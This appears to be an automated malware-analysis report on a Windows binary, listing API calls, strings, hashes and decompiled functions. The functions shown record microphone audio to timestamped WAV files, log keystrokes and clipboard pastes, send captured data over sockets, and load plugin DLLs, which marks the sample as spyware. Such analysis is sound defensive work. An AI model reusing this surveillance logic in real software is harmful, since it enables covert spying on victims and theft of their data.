                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402419
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040242F
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040243A
                                          • CreateThread.KERNEL32 ref: 0040244B
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402456
                                          • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0040FC60,73115DF0), ref: 0040246B
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402475
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040247E
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402487
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402499
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004024A7
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??4?$basic_string@V01@$??1?$basic_string@$?length@?$basic_string@?substr@?$basic_string@V12@$??0?$basic_string@??9std@@CreateD@2@@0@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?size@?$basic_string@D@1@@EventObjectSingleThreadWait
                                          • String ID:
                                          • API String ID: 2944316355-0
                                          • Opcode ID: aad691de20132ca68f57e677d5fc682d1c060bbf91795a29eecf0d4de655ffa4
                                          • Instruction ID: 8ff35d7655066902be5676fb1ff2957b2f75ed0f81b6480087796954eca2c198
                                          • Opcode Fuzzy Hash: aad691de20132ca68f57e677d5fc682d1c060bbf91795a29eecf0d4de655ffa4
                                          • Instruction Fuzzy Hash: 3E51FB7150020AEFCB049FA4ED9DDEE7F79FF44345B00816AF546A21A0DFB49989CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_fstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00401A91,00000022,00000001,?,00415160), ref: 00401710
                                          • ?seekp@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000,?,00415160), ref: 00401765
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(RIFF,00000004,?,00415160), ref: 0040177A
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00401A91,00000004,?,00415160), ref: 0040178B
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(WAVE,00000004,?,00415160), ref: 0040179D
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(fmt ,00000004,?,00415160), ref: 004017AF
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000010,00000004,?,00415160), ref: 004017C0
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(?,00000002,?,00415160), ref: 004017D2
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(004151DA,00000002,?,00415160), ref: 004017E5
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(004151DC,00000004,?,00415160), ref: 004017F7
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000000,00000004,?,00415160), ref: 00401808
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00401A91,00000002,?,00415160), ref: 0040181A
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(004151E6,00000002,?,00415160), ref: 0040182D
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(data,00000004,?,00415160), ref: 0040183F
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(?,00000004,?,00415160), ref: 00401850
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(?,?,?,00415160), ref: 00401861
                                          • ?close@?$basic_fstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,00415160), ref: 0040186D
                                          • ??_D?$basic_fstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,00415160), ref: 00401879
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: D@std@@@std@@U?$char_traits@$V12@$?write@?$basic_ostream@$??0?$basic_fstream@?close@?$basic_fstream@?seekp@?$basic_ostream@D?$basic_fstream@W4seekdir@ios_base@2@@
                                          • String ID: RIFF$WAVE$data$fmt
                                          • API String ID: 766087772-4212202414
                                          • Opcode ID: 52a0db0d95ad37626374cffde14f3dfd6f79d3945ae441a7bf68ff1ddc81c4b6
                                          • Instruction ID: d7aee1695a5c952c579fb531cba5a3b8ffd14c1b073e8637df3e8a3bae7d5bfd
                                          • Opcode Fuzzy Hash: 52a0db0d95ad37626374cffde14f3dfd6f79d3945ae441a7bf68ff1ddc81c4b6
                                          • Instruction Fuzzy Hash: A1410931A0121DEFDB24DB60DC4DFDA7B78FB59701F5080A9F156A20A0DBB05A84CF55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 22%
                                          			E004019AA(intOrPtr _a8, char _a11) {
                                          				char _v5;
                                          				char _v12;
                                          				void* _v28;
                                          				char _v44;
                                          				char _v60;
                                          				void* _v76;
                                          				char _v92;
                                          				char _v172;
                                          				int _t21;
                                          				char* _t23;
                                          				char* _t28;
                                          				char* _t29;
                                          				char* _t30;
                                          				char _t31;
                                          				CHAR* _t33;
                                          				intOrPtr _t34;
                                          				void* _t49;
                                          
                                          				_t21 =  &_v5;
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z(_t21);
                                          				if(_a8 == 0x3c0) {
                                          					__imp__time( &_v12, _t49);
                                          					_t23 =  &_v12;
                                          					__imp__localtime(_t23);
                                          					__imp__strftime( &_v172, 0x50, "%Y-%m-%d %H.%M", _t23);
                                          					puts( &_v172);
                                          					_t28 =  &_v172;
                                          					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t28,  &_a11, ".wav");
                                          					_t29 =  &_v60;
                                          					L0040FC26();
                                          					_t30 =  &_v92;
                                          					L0040FC14();
                                          					_t31 =  &_v44;
                                          					L0040FC20();
                                          					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t31, _t31, _t30, _t30, _t29, _t29, 0x4151a8, 0x5c, _t28);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					E004016F6(_t31, 0x415160);
                                          					_t33 = waveInUnprepareHeader( *0x4151d0, 0x415160, 0x20);
                                          					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					0x415160->lpData = _t33;
                                          					_t34 =  *0x415198; // 0x0
                                          					 *0x415164 = _t34;
                                          					 *0x415168 = 0;
                                          					 *0x41516c = 0;
                                          					 *0x415170 = 0;
                                          					 *0x415174 = 0;
                                          					waveInPrepareHeader( *0x4151d0, 0x415160, 0x20);
                                          					_t21 = waveInAddBuffer( *0x4151d0, 0x415160, 0x20);
                                          				}
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				return _t21;
                                          			}




















                                          0x004019b3
                                          0x004019ba
                                          0x004019c7
                                          0x004019d2
                                          0x004019d8
                                          0x004019dc
                                          0x004019f1
                                          0x004019fe
                                          0x00401a13
                                          0x00401a1a
                                          0x00401a23
                                          0x00401a2c
                                          0x00401a35
                                          0x00401a39
                                          0x00401a42
                                          0x00401a46
                                          0x00401a52
                                          0x00401a5b
                                          0x00401a64
                                          0x00401a6d
                                          0x00401a76
                                          0x00401a85
                                          0x00401a8c
                                          0x00401a9c
                                          0x00401aa7
                                          0x00401aad
                                          0x00401ab2
                                          0x00401ac0
                                          0x00401ac7
                                          0x00401acc
                                          0x00401ad1
                                          0x00401ad6
                                          0x00401adb
                                          0x00401aea
                                          0x00401af0
                                          0x00401af4
                                          0x00401afb

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004019BA
                                          • time.MSVCRT ref: 004019D2
                                          • localtime.MSVCRT ref: 004019DC
                                          • strftime.MSVCRT ref: 004019F1
                                          • puts.MSVCRT ref: 004019FE
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,.wav), ref: 00401A1A
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,004151A8,0000005C,00000000), ref: 00401A2C
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00000000), ref: 00401A39
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,00000000), ref: 00401A46
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00401A52
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00401A5B
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00401A64
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00401A6D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00401A76
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415160,?,?,?,?,?,?,?,?,00000000), ref: 00401A85
                                            • Part of subcall function 004016F6: ??0?$basic_fstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00401A91,00000022,00000001,?,00415160), ref: 00401710
                                            • Part of subcall function 004016F6: ?seekp@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000,?,00415160), ref: 00401765
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(RIFF,00000004,?,00415160), ref: 0040177A
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00401A91,00000004,?,00415160), ref: 0040178B
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(WAVE,00000004,?,00415160), ref: 0040179D
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(fmt ,00000004,?,00415160), ref: 004017AF
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000010,00000004,?,00415160), ref: 004017C0
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(?,00000002,?,00415160), ref: 004017D2
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(004151DA,00000002,?,00415160), ref: 004017E5
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(004151DC,00000004,?,00415160), ref: 004017F7
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000000,00000004,?,00415160), ref: 00401808
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00401A91,00000002,?,00415160), ref: 0040181A
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(004151E6,00000002,?,00415160), ref: 0040182D
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(data,00000004,?,00415160), ref: 0040183F
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(?,00000004,?,00415160), ref: 00401850
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(?,?,?,00415160), ref: 00401861
                                          • waveInUnprepareHeader.WINMM(00415160,00000020,?,?,?,?,?,?,?,00000000), ref: 00401A9C
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00401AA7
                                          • waveInPrepareHeader.WINMM(00415160,00000020,?,?,?,?,?,?,?,00000000), ref: 00401ADB
                                          • waveInAddBuffer.WINMM(00415160,00000020,?,?,?,?,?,?,?,00000000), ref: 00401AEA
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00000000), ref: 00401AF4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: U?$char_traits@$D@std@@@std@@$V12@V?$allocator@$?write@?$basic_ostream@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@wave$??0?$basic_string@?c_str@?$basic_string@D@1@@HeaderV10@$??0?$basic_fstream@??4?$basic_string@?seekp@?$basic_ostream@BufferPrepareUnprepareV01@V01@@V10@0@W4seekdir@ios_base@2@@localtimeputsstrftimetime
                                          • String ID: %Y-%m-%d %H.%M$.wav
                                          • API String ID: 866339126-3597965672
                                          • Opcode ID: e336fa7229d51b92b370b467780b3a0970c49e63df0d216bebf50965dbcfc115
                                          • Instruction ID: a5d7e3b402908acd5397dec8a66d2258045444051812afed8a23243a24f6b54c
                                          • Opcode Fuzzy Hash: e336fa7229d51b92b370b467780b3a0970c49e63df0d216bebf50965dbcfc115
                                          • Instruction Fuzzy Hash: 3431AA71D40209FFDB51DBA0EC4DADE7B78EB44305F448476F609E21A0EBB49589CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004108C8,?,00000000,?,774273F0,?), ref: 00404E88
                                          • toupper.MSVCRT ref: 00404E97
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [Ctrl + ,?,00000000), ref: 00404EAB
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 00404EB6
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404ED2
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404EDB
                                          • toupper.MSVCRT ref: 00404F6E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00404EC0
                                            • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,74B06490,?,00405E64), ref: 00403AAD
                                            • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,74B06490,?,00405E64), ref: 00403AC0
                                            • Part of subcall function 00403A9A: SetEvent.KERNEL32(00000000,?,00405E64), ref: 00403AC9
                                            • Part of subcall function 00403A9A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(74B06490,?,00405E64), ref: 00403AD8
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,774273F0,?), ref: 00404EE4
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?, [Ctrl + V][Following text has been pasted from clipboard:],00000000,?,[End of clipboard text],00000000,?,774273F0,?), ref: 00404F0E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text],00000000,?,774273F0,?), ref: 00404F18
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,774273F0,?), ref: 00404F2A
                                          • tolower.MSVCRT ref: 00404F47
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000001,?), ref: 00404FCC
                                          Strings
                                          • [End of clipboard text], xrefs: 00404EF9
                                          • [Ctrl + , xrefs: 00404EA3
                                          • [Ctrl + V][Following text has been pasted from clipboard:], xrefs: 00404F08
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@$V01@V01@@V10@Y?$basic_string@toupper$EventV10@0@V10@@tolower
                                          • String ID: [End of clipboard text]$ [Ctrl + $ [Ctrl + V][Following text has been pasted from clipboard:]
                                          • API String ID: 1567161615-221715050
                                          • Opcode ID: ebe4a0bf43562a0afdd6dc53c6e2911bed2e0ef583fe473b2b6e8d7be5cd96cd
                                          • Instruction ID: 0a172b601888657c7187d64dec92691b116b1295abc4ce990af629de97d6fe53
                                          • Opcode Fuzzy Hash: ebe4a0bf43562a0afdd6dc53c6e2911bed2e0ef583fe473b2b6e8d7be5cd96cd
                                          • Instruction Fuzzy Hash: 5641E7B1904209BFDB14E7E4DD499EE7B78EB40300F10447BF502A2191DA789F498759
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415940,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040250E
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DataStart]0000,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402522
                                          • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040252D
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402541
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040254D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402556
                                          • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402561
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 00402570
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040257A
                                          • send.WS2_32(?,00000000), ref: 00402584
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402590
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040259A
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000), ref: 004025B4
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 004025BE
                                          • send.WS2_32(?,00000000), ref: 004025C8
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025D2
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025DB
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025E4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@?length@?$basic_string@$?data@?$basic_string@send$??0?$basic_string@??4?$basic_string@?c_str@?$basic_string@?empty@?$basic_string@A?$basic_string@D@1@@D@2@@0@Hstd@@V01@V01@@V10@0@V?$basic_string@
                                          • String ID: [DataStart]0000
                                          • API String ID: 4073614965-1609390111
                                          • Opcode ID: 7e598602d1d75a9b31fa36fcff603eab0cdb362e5764c1e6d8b2889a5f4be3cd
                                          • Instruction ID: da84d689751dc417b3d6efdffba69dc45be3ba0d0bf169ed1abd597d19f590f1
                                          • Opcode Fuzzy Hash: 7e598602d1d75a9b31fa36fcff603eab0cdb362e5764c1e6d8b2889a5f4be3cd
                                          • Instruction Fuzzy Hash: 7D21EC72500009AFCB04EFA0DD5D9EE7B78EB58345B0041B5F906E61A0DFB49E89CBA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 20%
                                          			E0040612A(void* __eflags, intOrPtr _a4, char _a8) {
                                          				char _v20;
                                          				char _v36;
                                          				char _v52;
                                          				char _v68;
                                          				void* _t22;
                                          				char* _t27;
                                          				void* _t30;
                                          				char* _t35;
                                          				intOrPtr* _t58;
                                          				void* _t61;
                                          				void* _t64;
                                          
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x415268);
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_a8);
                                          				E0040EFB5(__eflags);
                                          				_t64 = _t61 + 0x24;
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E00401289( &_v20, __eflags, 0),  &_v20);
                                          				_t58 = __imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z;
                                          				_t22 =  *_t58( &_v36, "fundlldata");
                                          				_t68 = _t22;
                                          				if(_t22 == 0) {
                                          					__eflags =  *_t58( &_v36, "funfunc");
                                          					if(__eflags != 0) {
                                          						_t27 = E00401289( &_v20, __eflags, 1);
                                          						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          						 *0x4157c0(atoi(_t27));
                                          					}
                                          				} else {
                                          					_t30 = E00401289( &_v20, _t68, 1);
                                          					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					if(E004052EC(_t30) != 0) {
                                          						 *0x4157c0 = E00405546(_t31, "FunFunc");
                                          						 *0x4157c4 = 1;
                                          						_t35 =  &_v52;
                                          						L0040FC1A();
                                          						L0040FC14();
                                          						E00402198(_a4, _t64);
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t35, _t35, "funready", 0x415268, E0040EDD3( &_v68, 0x415988));
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					}
                                          				}
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				E00401B3C( &_v20);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				return 0;
                                          			}














                                          0x0040613d
                                          0x0040614c
                                          0x00406156
                                          0x0040615b
                                          0x0040616c
                                          0x00406172
                                          0x00406181
                                          0x00406184
                                          0x00406187
                                          0x0040621a
                                          0x0040621d
                                          0x00406224
                                          0x0040622b
                                          0x00406239
                                          0x00406240
                                          0x0040618d
                                          0x00406192
                                          0x00406199
                                          0x004061a8
                                          0x004061b9
                                          0x004061c7
                                          0x004061d7
                                          0x004061e0
                                          0x004061ea
                                          0x004061f5
                                          0x004061fd
                                          0x00406206
                                          0x00406206
                                          0x004061a8
                                          0x00406244
                                          0x0040624d
                                          0x00406255
                                          0x00406260

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00415268), ref: 0040613D
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040614C
                                            • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
